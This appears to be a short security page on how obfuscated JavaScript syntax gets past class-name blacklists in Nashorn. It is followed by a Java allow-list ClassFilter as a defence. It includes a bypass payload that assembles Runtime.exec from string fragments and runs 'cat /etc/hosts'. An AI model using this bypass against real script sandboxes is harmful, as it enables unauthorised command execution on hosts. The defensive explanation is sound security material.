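JavaScript supports all sorts of odd syntax for invoking class methods, so the usual approach of restricting command execution by checking whether the code contains a given class name can be bypassed: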
var String= java['lang']["String"];
var String= "java.lang.String";
var String=java['lan'+'g']['Str'+'ing']['valueOf']('8');
Bypass method 1:
var input= java['lang']['Ru'+'ntime']['getR'+'untime']()['exec']('cat /etc/hosts').getInputStream();
u = new Packages.java.util.Scanner(input, "UTF-8").useDelimiter
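Because the class name can be spelled in any of these ways, the check holds up better when it sits in the engine rather than in a string match over the script. The following is an added example, not code from the original page: it assumes the scripts run in JDK 8 Nashorn (8u40 or later, where ClassFilter exists), and the allow-list contents and sample scripts are constructed for illustration.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.script.ScriptEngine;
import javax.script.ScriptException;
import jdk.nashorn.api.scripting.ClassFilter;
import jdk.nashorn.api.scripting.NashornScriptEngineFactory;

public class AllowListedEngine {
    // Hypothetical allow-list: only the classes the embedded scripts really need.
    private static final Set<String> ALLOWED =
            new HashSet<>(Arrays.asList("java.util.ArrayList"));

    // Nashorn passes the filter the class name it is about to resolve, built at
    // run time, so bracket access and string concatenation make no difference.
    static final class AllowList implements ClassFilter {
        @Override
        public boolean exposeToScripts(String className) {
            return ALLOWED.contains(className);
        }
    }

    static String run(ScriptEngine engine, String script) {
        try {
            return "result: " + engine.eval(script);
        } catch (ScriptException | RuntimeException e) {
            // A refused name never resolves to a class; the call on it fails.
            return "refused: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        ScriptEngine engine =
                new NashornScriptEngineFactory().getScriptEngine(new AllowList());

        // Constructed samples in the page's spelling styles; none runs a command.
        String[] samples = {
            "java.lang.Runtime.getRuntime()",
            "java['lang']['Ru'+'ntime']['getR'+'untime']()",
            "new Packages.java.util.Scanner('a b').next()",
            "var l = new java.util.ArrayList(); l.add('x'); l.size()"
        };
        for (String s : samples) {
            System.out.println(s + "\n  -> " + run(engine, s));
        }
    }
}
```

The filter is deny-by-default: anything not listed in ALLOWED is treated as if the class did not exist, whichever syntax the script uses to name it.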